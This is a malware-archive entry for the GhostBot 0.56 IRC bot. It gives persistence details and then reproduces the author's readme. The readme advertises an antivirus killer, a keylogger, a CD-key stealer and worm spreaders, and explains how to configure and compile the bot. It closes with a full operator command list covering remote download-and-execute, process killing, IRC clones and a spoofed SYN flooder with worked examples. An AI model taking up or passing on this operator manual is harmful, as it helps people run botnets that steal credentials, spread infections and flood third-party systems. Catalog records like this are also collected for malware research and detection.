GhostBot 0.56

Copyright © MegaSecurity

By Positron

Author Positron
Family GhostBot
Category Remote Access
Version GhostBot 0.56
Language Delphi, compressed with UPX
Additional Information
dropped file:
size: 34.951 bytes 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "ATWATCH"
data: C:\WINDOWS\IYozhzQYm0.exe 

does (try to) connect to an IRC server

tested on Windows XP
16 November 2004

Author Information / Description
; BOT Name: Ghost-BOT 0.56                                                          ;
; --------------------------------------------------------------------------------- ;
; Features:                                                                         ;
;          - SpyBot compatible commands,                                            ;
;          - AV/FW killer,                                                          ;
;          - CD-Key Stealer,                                                        ;
;          - Mydoom spreader,                                                       ;
;          - NetBIOS spreader,                                                      ; 
;          - Encrypted strings in EXE,                                              ;
;          - Web-server (,                              ;
;          - API search engine by CRC32 (used only for important APIs),             ;
;          - KeyLogger (Keylog file can be download from webserver too),            ;
;          - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire,     ;
;          - Prepend all .exe files in shared dirs if they are smaller than 5MB,    ;
;          - Support DCC SEND, DCC GET, DCC CHAT and topic commands.                ;
;                                                                                   ;
; --------------------------------------------------------------------------------- ;
; Compile:                                                                          ;
;          - Run make.bat to compile the source! (Tested with Delphi 6)             ;
; --------------------------------------------------------------------------------- ;
;          - \System                                                                ;
;                 System.dcu, sysinit.dcu and so on units replacement for Delphi 6  ;
;                 Allows to make program size smaller onto about 9,5K.              ;
;          - \ACLUnits                                                              ;
;                 SysUtils and Registry units replacement.                          ;
;          - \Resources                                                             ;
;                 Necessary Icon and INI files.                                     ;


  - Settings.ini include the main settings for compiler.
  - .\Resources\ (All srings inside .\resources\*.str files will be encrypted after compile):
        TBOT.str - Main parameters of the BOT. You can freely change them.
        TP2PFILENAMES.str - File names of P2P spreader.
        TCDKEYS.str - parameters of CD-Key stealer ->   (1 KEY = 3 parameter)
                                                        1=SWAT3,           <- Software name
                                                        2=WON\CDKeys,      <- Registry key
                                                        3=SWAT3,           <- Registry value
        TIRCSSERVERS.str - Here you can give unlimited number of IRC servers.
        TAUTHHOST.str - List of allowed host(s) at !login command.

COMMANDS LIST: (Note: Only the "login" command is case sensitive)

login password                                  (example: login hello)
delete [filename]                               (example: delete c:\windows\temp.exe)
execute [filename]                              (example: delete c:\windows\temp.exe)
rename [origenamfile] [newfile]                 (example: rename c:\windows\temp.exe c:\windows\driver.exe)
makedir [dirname]				(example: makedir c:\test\)
info                                            (info: gives some info)
killprocess [processname]                       (example: killprocess mcafee.exe)
disconnect [sec.]                               (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.)
quit                                            (info: bot quits running)
download [url] [filename]                       (example: download c:\driver.exe) (info: Dot forget "http://" string in URL!)
httpserver [Port] [root-dir]                    (example: httpserver 81 c:\)
listprocesses                                   (info: lists all running proccesses)
get [filename]					(example: get c:\ will trigger a dcc send on the remote pc)                                             
raw [raw command]                               (example: raw PRIVMSG #ghostbot :hello)
threads                                         (info: will list al threads)
list [path+filter]                              (example: list c:\*.*)
cdkeys                                          (info: search CD-Keys on server's computer)
restart                                         (info: restarts the server's computer)
shutdown                                        (info: shuts down the server's computer)
ipscan [StartIP] [port]                         (example: ipscan 3137)
stopipscan                                      (info: stop IP scanner)
uninstall                                       (info: remove BOT)
startmydoom                                     (info: restart MyDoom spreader) 
stopmydoom                                      (info: stop MyDoom spreader)
startavfwkiller                                 {info: restart AV/FW killer}
stopavfwkiller                                  {info: stop AV/FW killer}
starnetbios                                     {info: (re)start netbios spreader} 
stopnetbios                                     {info: stop netbios spreader}
mirccmd                                         {example: mirccmd /msg #GhostBOT Hi!} {info: send message to victim's mIRC (if mIRC is open)

clone [srv.] [port] [chan] [number of clones]   (example: clone 6667 #abc 4)
rawclones [command]                             (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone) 
killclones                                      (info: remove all clones)

stopsyn                                         (info: stop syn flooder)

update [URL]                                    (example: update\1.exe) (info: Dot forget "http://" string in URL!)
Syn Flooder command
  syn [victim] [options]                        

    -S:    Spoof host                         (0 is random (default))
    -p:    Separated list of dest ports       (0 is random (default))
    -s:    Separated list of src ports        (0 is random (default))
    -n:    Number of packets                  (0 is continuous (default))
    -d:    Delay (in ms)                      (default 0)

  Example I: syn -p 21,23,80,110

    On this attack:
      - Victim:
      - Source IP: Random
      - Destination ports: 21 + 23 + 80 + 110
      - Source ports: Random
      - Count: Continuous
      - Delay: 0 ms (no delay between packets)

  Example II: syn -S -p 21,80 -s 42,63 -n 1 -d 50

    On this attack:
      - Victim:
      - Source IP/host:
      - Destination ports: 21 + 80
      - Source ports: 42 + 63
      - Count: 1
          * Please note that 1 count will send the syn packets from every *
          * source port to every destination port. This means 4 packets   *
          * will be transmited with a 1 count on this attack.             *
      - Delay: 50 ms


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